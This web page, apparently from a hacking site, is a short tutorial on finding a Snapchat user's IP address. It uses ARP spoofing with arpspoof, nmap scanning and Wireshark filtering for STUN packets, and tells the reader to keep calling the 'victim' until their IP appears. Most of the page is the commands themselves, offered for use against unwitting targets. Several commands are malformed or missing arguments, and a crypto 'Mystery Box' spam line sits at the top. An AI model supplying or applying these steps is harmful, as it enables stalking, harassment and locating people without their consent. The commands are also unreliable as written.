Get Mystery Box with random crypto!

How To Get IP Address Of Any Snapchat User [Easy MITM attack] | Hyper Hackers

How To Get IP Address Of Any Snapchat User [Easy MITM attack]

Required:
Mac OS / Linux
A phone where you have Snapchat
Nmap
Some tools and little MITM knowledge!

Here is the tut:
Download Wireshark Here
Download arpspoof Here  – MACOS only* – Kali Linux has this already!

1. Fire up the terminal and IP forward your laptop/pc with this script:

Linux: sudo sysctl net.ipv4.ip_forward = 1
sudo net.ipv4.ip_forward = 1

Mac: sudo sysctl -w net.inet.ip.forwarding=1

2. Find your phone device’s local IP and write it down.
nmap -sn /24
Example: nmap -sn (or -sP) 192.168.0.1/24

3. Spoof your phone.
arpspoof -i -t gateway
Example:  arpspoof -i en0 -t 192.168.0.160 192.168.0.1

4. Fire up Wireshark and filter on your phone ip with STUN protocol
ip.addr == && stun
Example: ip.addr == 192.168.0.160 && stun

5. Call your victim on snap and keep calling him for around 5 seconds.
THEY DO NOT NEED NECESSARY TO ANSWER
You will see on Wireshark some binding requests,  then some other STUN ones.

Want content like this in your channel or group ping me at @himanshu_jangra_official